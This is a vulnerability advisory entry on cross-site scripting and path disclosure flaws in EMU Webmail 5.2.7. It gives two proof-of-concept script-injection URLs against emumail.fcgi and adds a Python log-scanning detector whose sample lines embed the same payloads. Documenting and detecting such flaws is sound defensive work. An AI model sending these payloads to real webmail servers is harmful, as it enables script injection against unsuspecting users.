Vendor: EMU Webmail
By: SecurityFocus
CVSS: 7.5 (HIGH)
Vulnerability Type: Cross-site Scripting
CWE: 79
Product Name: EMU Webmail
Affected Version From: 5.2.2007
Affected Version To: 5.2.2007
Patch Exists: YES
Related CWE: N/A
CPE: a:emu_software:emu_webmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Multiple vulnerabilities in EMU Webmail 5.2.7

Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, the 'emumail.fcgi' script and the 'init.emu' sample script.

Mitigation:

Input validation should be used to prevent the execution of malicious scripts.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9861/info
 
EMU Webmail 5.2.7 has been reported to be affected by these issues.

http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
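
A detection check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web access log lines for requests to 'emumail.fcgi' whose query parameters carry angle brackets after URL decoding, including double-encoded values. It goes beyond the two parameters listed ('variable', 'folder') by checking every parameter; the log lines, the log format and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_NAME = "emumail.fcgi"      # script named in the advisory
MARKUP_RE = re.compile(r"[<>]")   # angle brackets in a parameter value

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /webmail/emumail.fcgi'
    '?passed=parse&variable=%3Cscript%3Ealert(%22G%22)%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /webmail/emumail.fcgi'
    '?passed=go_index&folder=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 498',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /webmail/emumail.fcgi'
    '?passed=go_index&folder=INBOX HTTP/1.1" 200 2048',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253C is still seen as '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for markup-bearing parameters in a
    request to emumail.fcgi; an empty list for anything else."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/" + SCRIPT_NAME):
        return []
    hits = []
    # parse_qsl performs the first round of URL decoding.
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)
        if MARKUP_RE.search(value):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```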